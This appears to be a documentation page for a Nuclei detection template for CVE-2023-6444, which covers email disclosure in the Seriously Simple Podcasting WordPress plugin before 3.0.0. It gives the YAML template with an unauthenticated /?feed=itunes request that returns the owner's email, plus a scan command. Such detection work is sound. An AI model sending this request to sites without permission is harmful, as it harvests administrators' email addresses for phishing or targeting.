Seriously Simple Podcasting < 3.0.0 - Information Disclosure
ID: CVE-2023-6444
Severity: medium
Author: s4e-io
Tags: cve,cve2023,wordpress,wp-plugin,exposure,wp,seriously-simple-podcasting
Description
Section titled “Description”The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner’s email address (which by default is the admin email address) via an unauthenticated crafted request.
YAML Source
Section titled “YAML Source”id: CVE-2023-6444
info: name: Seriously Simple Podcasting < 3.0.0 - Information Disclosure author: s4e-io severity: medium description: | The Seriously Simple Podcasting WordPress plugin before 3.0.0 discloses the Podcast owner's email address (which by default is the admin email address) via an unauthenticated crafted request. remediation: Fixed in 3.0.0 reference: - https://wpscan.com/vulnerability/061c59d6-f4a0-4cd1-b945-5e92b9c2b4aa/ - https://github.com/Wayne-Ker/CVE-2023-6444-POC/blob/main/cve-2023-6444.py - https://nvd.nist.gov/vuln/detail/CVE-2023-6444 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-6444 epss-score: 0.00043 epss-percentile: 0.09401 cpe: cpe:2.3:a:seriously_simple_podcasting_plugin:seriously_simple_podcasting_plugin:2:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: castos product: seriously-simple-podcasting framework: wordpress publicwww-query: "/wp-content/plugins/seriously-simple-podcasting/" tags: cve,cve2023,wordpress,wp-plugin,exposure,wp,seriously-simple-podcasting
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(body,"/wp-content/plugins/seriously-simple-podcasting")' - "status_code == 200" condition: and internal: true
- raw: - | GET /?feed=itunes HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains_all(body,"<itunes:email>","</itunes:email>")' - 'contains(content_type,"text/xml")' - "status_code == 200" condition: and# digest: 4a0a00473045022100bf80aa00bc6e0c8d42dda659a14f52260984523e2f6e5381d33c07da6d659cd202206a46e76c1eb7cb219b1b3ce092adaea349dfe63383976836b24d676da6fe26b3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-6444.yaml"